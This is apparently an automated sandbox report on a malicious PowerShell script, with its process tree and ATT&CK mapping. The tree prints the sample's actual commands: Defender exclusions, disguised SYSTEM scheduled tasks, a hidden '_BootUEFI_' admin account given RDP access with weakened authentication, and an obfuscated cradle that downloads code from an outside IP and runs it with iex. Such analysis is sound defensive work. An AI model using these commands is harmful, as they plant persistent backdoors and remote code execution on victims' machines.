c3255374e2871058472680b594d0eadbfd73c0de7494214576d7796dd1b05a92

Analysis

max time kernel
144s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
27-11-2024 03:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c3255374e2871058472680b594d0eadbfd73c0de7494214576d7796dd1b05a92.ps1
Size

4KB
MD5

3f5f652952ced2761ef056b5a11b8896
SHA1

186bf77a973d93fde13aeb7beeebded71188bd91
SHA256

c3255374e2871058472680b594d0eadbfd73c0de7494214576d7796dd1b05a92
SHA512

46ec872ff49ce3fd8ef25de88c616ce0dc6025b8c1b43a43f0a8c9a4e45974de234efee2a9406162589bbeed93ad26d5fe432ae5deecaddd5f9a5e1d3516982e
SSDEEP

96:VerCwM6AqiyYT4PVvp8VcxCOTjb1ZU2WuKaMYAbGwIEKER:VeWdBqiyYqRRJTw2HKaLAztPR

Score

9^/10

defense_evasion discovery execution lateral_movement

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 4 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
4828	net1.exe
4880	net.exe
1716	net1.exe
3488	net.exe

Blocklisted process makes network request 25 IoCs

flow	pid	Process
7	1160	powershell.exe
18	5108	powershell.exe
24	5108	powershell.exe
25	5108	powershell.exe
26	5108	powershell.exe
40	5108	powershell.exe
41	5108	powershell.exe
42	5108	powershell.exe
43	5108	powershell.exe
44	5108	powershell.exe
47	5108	powershell.exe
49	5108	powershell.exe
50	5108	powershell.exe
51	5108	powershell.exe
52	5108	powershell.exe
56	5108	powershell.exe
58	5108	powershell.exe
59	5108	powershell.exe
60	5108	powershell.exe
61	5108	powershell.exe
62	5108	powershell.exe
63	5108	powershell.exe
64	5108	powershell.exe
65	5108	powershell.exe
66	5108	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1160	powershell.exe
4104	powershell.exe
4536	powershell.exe
5012	powershell.exe
5108	powershell.exe
2608	powershell.exe

Indicator Removal: Network Share Connection Removal 1 TTPs 2 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
3304	net.exe
908	net1.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google Chrome.lnk	powershell.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\sysmon.bat	cmd.exe
File created	C:\Windows\System32\sysmon2.bat	cmd.exe
File opened for modification	C:\Windows\System32\sysmon2.bat	cmd.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File created	C:\Windows\System32\sysmon.bat	cmd.exe

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\_BootUEFI_ = "0"	reg.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
3060	ipconfig.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1604	systeminfo.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Terminal Server Client\AuthenticationLevelOverride = "0"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Terminal Server Client	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2752	schtasks.exe
4820	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1160	powershell.exe
1160	powershell.exe
2608	powershell.exe
2608	powershell.exe
1160	powershell.exe
4536	powershell.exe
4536	powershell.exe
4104	powershell.exe
4104	powershell.exe
5012	powershell.exe
5012	powershell.exe
5108	powershell.exe
5108	powershell.exe
5108	powershell.exe
1160	powershell.exe
1160	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1160	powershell.exe
Token: SeDebugPrivilege	2608	powershell.exe
Token: SeDebugPrivilege	4536	powershell.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	5012	powershell.exe
Token: SeDebugPrivilege	5108	powershell.exe
Token: SeIncreaseQuotaPrivilege	4104	powershell.exe
Token: SeSecurityPrivilege	4104	powershell.exe
Token: SeTakeOwnershipPrivilege	4104	powershell.exe
Token: SeLoadDriverPrivilege	4104	powershell.exe
Token: SeSystemProfilePrivilege	4104	powershell.exe
Token: SeSystemtimePrivilege	4104	powershell.exe
Token: SeProfSingleProcessPrivilege	4104	powershell.exe
Token: SeIncBasePriorityPrivilege	4104	powershell.exe
Token: SeCreatePagefilePrivilege	4104	powershell.exe
Token: SeBackupPrivilege	4104	powershell.exe
Token: SeRestorePrivilege	4104	powershell.exe
Token: SeShutdownPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeSystemEnvironmentPrivilege	4104	powershell.exe
Token: SeRemoteShutdownPrivilege	4104	powershell.exe
Token: SeUndockPrivilege	4104	powershell.exe
Token: SeManageVolumePrivilege	4104	powershell.exe
Token: 33	4104	powershell.exe
Token: 34	4104	powershell.exe
Token: 35	4104	powershell.exe
Token: 36	4104	powershell.exe
Token: SeIncreaseQuotaPrivilege	4104	powershell.exe
Token: SeSecurityPrivilege	4104	powershell.exe
Token: SeTakeOwnershipPrivilege	4104	powershell.exe
Token: SeLoadDriverPrivilege	4104	powershell.exe
Token: SeSystemProfilePrivilege	4104	powershell.exe
Token: SeSystemtimePrivilege	4104	powershell.exe
Token: SeProfSingleProcessPrivilege	4104	powershell.exe
Token: SeIncBasePriorityPrivilege	4104	powershell.exe
Token: SeCreatePagefilePrivilege	4104	powershell.exe
Token: SeBackupPrivilege	4104	powershell.exe
Token: SeRestorePrivilege	4104	powershell.exe
Token: SeShutdownPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeSystemEnvironmentPrivilege	4104	powershell.exe
Token: SeRemoteShutdownPrivilege	4104	powershell.exe
Token: SeUndockPrivilege	4104	powershell.exe
Token: SeManageVolumePrivilege	4104	powershell.exe
Token: 33	4104	powershell.exe
Token: 34	4104	powershell.exe
Token: 35	4104	powershell.exe
Token: 36	4104	powershell.exe
Token: SeIncreaseQuotaPrivilege	4104	powershell.exe
Token: SeSecurityPrivilege	4104	powershell.exe
Token: SeTakeOwnershipPrivilege	4104	powershell.exe
Token: SeLoadDriverPrivilege	4104	powershell.exe
Token: SeSystemProfilePrivilege	4104	powershell.exe
Token: SeSystemtimePrivilege	4104	powershell.exe
Token: SeProfSingleProcessPrivilege	4104	powershell.exe
Token: SeIncBasePriorityPrivilege	4104	powershell.exe
Token: SeCreatePagefilePrivilege	4104	powershell.exe
Token: SeBackupPrivilege	4104	powershell.exe
Token: SeRestorePrivilege	4104	powershell.exe
Token: SeShutdownPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeSystemEnvironmentPrivilege	4104	powershell.exe
Token: SeRemoteShutdownPrivilege	4104	powershell.exe
Token: SeUndockPrivilege	4104	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1160 wrote to memory of 2608	1160	powershell.exe	84
PID 1160 wrote to memory of 2608	1160	powershell.exe	84
PID 1160 wrote to memory of 2388	1160	powershell.exe	86
PID 1160 wrote to memory of 2388	1160	powershell.exe	86
PID 2388 wrote to memory of 4536	2388	cmd.exe	90
PID 2388 wrote to memory of 4536	2388	cmd.exe	90
PID 1160 wrote to memory of 4104	1160	powershell.exe	92
PID 1160 wrote to memory of 4104	1160	powershell.exe	92
PID 2388 wrote to memory of 3632	2388	cmd.exe	95
PID 2388 wrote to memory of 3632	2388	cmd.exe	95
PID 2388 wrote to memory of 3896	2388	cmd.exe	96
PID 2388 wrote to memory of 3896	2388	cmd.exe	96
PID 2388 wrote to memory of 2752	2388	cmd.exe	97
PID 2388 wrote to memory of 2752	2388	cmd.exe	97
PID 2388 wrote to memory of 1568	2388	cmd.exe	98
PID 2388 wrote to memory of 1568	2388	cmd.exe	98
PID 636 wrote to memory of 740	636	cmd.exe	101
PID 636 wrote to memory of 740	636	cmd.exe	101
PID 636 wrote to memory of 2324	636	cmd.exe	102
PID 636 wrote to memory of 2324	636	cmd.exe	102
PID 636 wrote to memory of 4820	636	cmd.exe	103
PID 636 wrote to memory of 4820	636	cmd.exe	103
PID 636 wrote to memory of 2812	636	cmd.exe	105
PID 636 wrote to memory of 2812	636	cmd.exe	105
PID 3636 wrote to memory of 2156	3636	cmd.exe	108
PID 3636 wrote to memory of 2156	3636	cmd.exe	108
PID 2156 wrote to memory of 380	2156	net.exe	109
PID 2156 wrote to memory of 380	2156	net.exe	109
PID 3636 wrote to memory of 2644	3636	cmd.exe	110
PID 3636 wrote to memory of 2644	3636	cmd.exe	110
PID 2644 wrote to memory of 3544	2644	net.exe	111
PID 2644 wrote to memory of 3544	2644	net.exe	111
PID 3636 wrote to memory of 3880	3636	cmd.exe	112
PID 3636 wrote to memory of 3880	3636	cmd.exe	112
PID 3880 wrote to memory of 4200	3880	net.exe	113
PID 3880 wrote to memory of 4200	3880	net.exe	113
PID 3636 wrote to memory of 4880	3636	cmd.exe	114
PID 3636 wrote to memory of 4880	3636	cmd.exe	114
PID 4880 wrote to memory of 1716	4880	net.exe	115
PID 4880 wrote to memory of 1716	4880	net.exe	115
PID 3636 wrote to memory of 3488	3636	cmd.exe	116
PID 3636 wrote to memory of 3488	3636	cmd.exe	116
PID 3488 wrote to memory of 4828	3488	net.exe	117
PID 3488 wrote to memory of 4828	3488	net.exe	117
PID 3636 wrote to memory of 3304	3636	cmd.exe	118
PID 3636 wrote to memory of 3304	3636	cmd.exe	118
PID 3304 wrote to memory of 908	3304	net.exe	119
PID 3304 wrote to memory of 908	3304	net.exe	119
PID 3636 wrote to memory of 4628	3636	cmd.exe	120
PID 3636 wrote to memory of 4628	3636	cmd.exe	120
PID 3636 wrote to memory of 5096	3636	cmd.exe	121
PID 3636 wrote to memory of 5096	3636	cmd.exe	121
PID 3636 wrote to memory of 3680	3636	cmd.exe	122
PID 3636 wrote to memory of 3680	3636	cmd.exe	122
PID 3636 wrote to memory of 808	3636	cmd.exe	123
PID 3636 wrote to memory of 808	3636	cmd.exe	123
PID 3636 wrote to memory of 3244	3636	cmd.exe	124
PID 3636 wrote to memory of 3244	3636	cmd.exe	124
PID 3636 wrote to memory of 4164	3636	cmd.exe	125
PID 3636 wrote to memory of 4164	3636	cmd.exe	125
PID 3636 wrote to memory of 5012	3636	cmd.exe	126
PID 3636 wrote to memory of 5012	3636	cmd.exe	126
PID 3636 wrote to memory of 5108	3636	cmd.exe	129
PID 3636 wrote to memory of 5108	3636	cmd.exe	129

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\c3255374e2871058472680b594d0eadbfd73c0de7494214576d7796dd1b05a92.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2608
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\scheduler-once.bat"
  2⤵
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:2388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -w hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AHcAaQBuAGQAaQByAFwAUwB5AHMAdABlAG0AMwAyACIA
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4536
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "Intel(R) Ethernet Connection 1219-LM" /f
    3⤵
    PID:3632
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "Intel(R) Ethernet2 Connection 1219-LM" /f
    3⤵
    PID:3896
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "Intel(R) Ethernet2 Connection 1219-LM" /tr "C:\Windows\System32\sysmon2.bat" /ru "SYSTEM" /sc ONSTART /rl HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2752
- - C:\Windows\system32\schtasks.exe
    schtasks /run /tn "Intel(R) Ethernet2 Connection 1219-LM"
    3⤵
    PID:1568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4104
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:3060
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    PID:2996
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:3700
- - C:\Windows\system32\query.exe
    "C:\Windows\system32\query.exe" user
    3⤵
    PID:4420
  - - C:\Windows\system32\quser.exe
      "C:\Windows\system32\quser.exe"
      4⤵
      PID:960
- - C:\Windows\system32\systeminfo.exe
    "C:\Windows\system32\systeminfo.exe"
    3⤵
    - Gathers system information
    PID:1604

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Windows\System32\sysmon2.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:636
- C:\Windows\system32\schtasks.exe
  schtasks /delete /tn "Intel(R) Ethernet Connection 1219-LM2" /f
  2⤵
  PID:740
- C:\Windows\system32\schtasks.exe
  schtasks /delete /tn "Intel(R) Ethernet2 Connection 1219-LM2" /f
  2⤵
  PID:2324
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn "Intel(R) Ethernet2 Connection 1219-LM2" /tr "C:\Windows\System32\sysmon.bat" /ru "SYSTEM" /sc MINUTE /mo 5 /rl HIGHEST
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4820
- C:\Windows\system32\schtasks.exe
  schtasks /run /tn "Intel(R) Ethernet2 Connection 1219-LM2"
  2⤵
  PID:2812

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Windows\System32\sysmon.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3636
- C:\Windows\system32\net.exe
  net user _BootUEFI_ /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2156
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user _BootUEFI_ /add
    3⤵
    PID:380
- C:\Windows\system32\net.exe
  net user _BootUEFI_ 123456!!! /active:yes /comment:"A account for booting the computer as uefi mode." /fullname:"_BootUEFI_Hosting_ Host Account"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2644
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user _BootUEFI_ 123456!!! /active:yes /comment:"A account for booting the computer as uefi mode." /fullname:"_BootUEFI_Hosting_ Host Account"
    3⤵
    PID:3544
- C:\Windows\system32\net.exe
  net localgroup Administrators _BootUEFI_ /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup Administrators _BootUEFI_ /add
    3⤵
    PID:4200
- C:\Windows\system32\net.exe
  net localgroup "Remote Desktop Users" /add
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  - Suspicious use of WriteProcessMemory
  PID:4880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup "Remote Desktop Users" /add
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:1716
- C:\Windows\system32\net.exe
  net localgroup "Remote Desktop Users" _BootUEFI_ /add
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  - Suspicious use of WriteProcessMemory
  PID:3488
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup "Remote Desktop Users" _BootUEFI_ /add
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:4828
- C:\Windows\system32\net.exe
  net localgroup "Users" _BootUEFI_ /delete
  2⤵
  - Indicator Removal: Network Share Connection Removal
  - Suspicious use of WriteProcessMemory
  PID:3304
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup "Users" _BootUEFI_ /delete
    3⤵
    - Indicator Removal: Network Share Connection Removal
    PID:908
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  2⤵
  PID:4628
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\Client" /v fClientDisableUDP /t REG_DWORD /d 1 /f
  2⤵
  PID:5096
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v _BootUEFI_ /t REG_DWORD /d 0 /f
  2⤵
  - Hide Artifacts: Hidden Users
  PID:3680
- C:\Windows\system32\reg.exe
  reg add "HKCU\SOFTWARE\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride /t REG_DWORD /d 0 /f
  2⤵
  - Modifies data under HKEY_USERS
  PID:808
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
  2⤵
  PID:3244
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
  2⤵
  PID:4164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ep bypass -w hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AHcAaQBuAGQAaQByAFwAUwB5AHMAdABlAG0AMwAyACIA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "[string] $a = {(eliasneliaseeliasw-eliasObeliasjeeliasct neeliast.weliasebeliasCleliasient).eliasdeliasoeliaswnleliasoeliasaeliasdSeliastreliasieliasneliasg('eliasheliasteliasteliasp:eliaselias/eliaselias/1elias54.9elias0.6elias2.24elias8/wHk4tMu9XpWA/eliasaelias.eliaspeliaseliasselias1eliaselias')}; $b=$a.replace('elias','');$c=iex $b;iex $c"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Account Manipulation

T1098

Scheduled Task/Job

T1053

